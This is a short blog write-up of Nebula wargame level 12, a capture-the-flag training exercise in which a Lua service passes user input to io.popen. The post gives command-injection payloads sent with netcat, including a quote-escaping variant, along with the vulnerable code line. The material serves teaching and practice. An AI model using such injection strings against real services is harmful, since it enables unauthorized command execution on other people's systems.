blog.ferling.eu by Benedikt Ferling


 

exploit-exercises.com/nebula -- Level 12

Problem

  1. Userinput is used directly as command line argument.

Exploit

In this level the user input is directly passed to a function, which executes code. Thus, the solution is simple. Connect to the port, terminate the first command with a ; and pass a command afterwards.

1
2
echo '; getflag >/tmp/flag12' | netcat localhost 50001
cat /tmp/flag12

Use cat to see the flag:

1
cat /tmp/flag12

Lesson / How to fix

  1. Do not trust user input!

In this case single quotes like the following do not help:

1
2
3
...
  prog = io.popen("echo '"..password.."' | sha1sum", "r")
...

Exploit:

1
echo "' ; getflag >/tmp/flag123 ; ' " | netcat localhost 50001

The API of LUA does not provide any good information. Since I’m not a Lua-expert either, I owe you again a fix to a problem…


other levels…

00 01 02 03 04 05 06 07 08 09
10 11 12 13 14 15 16 17 18 19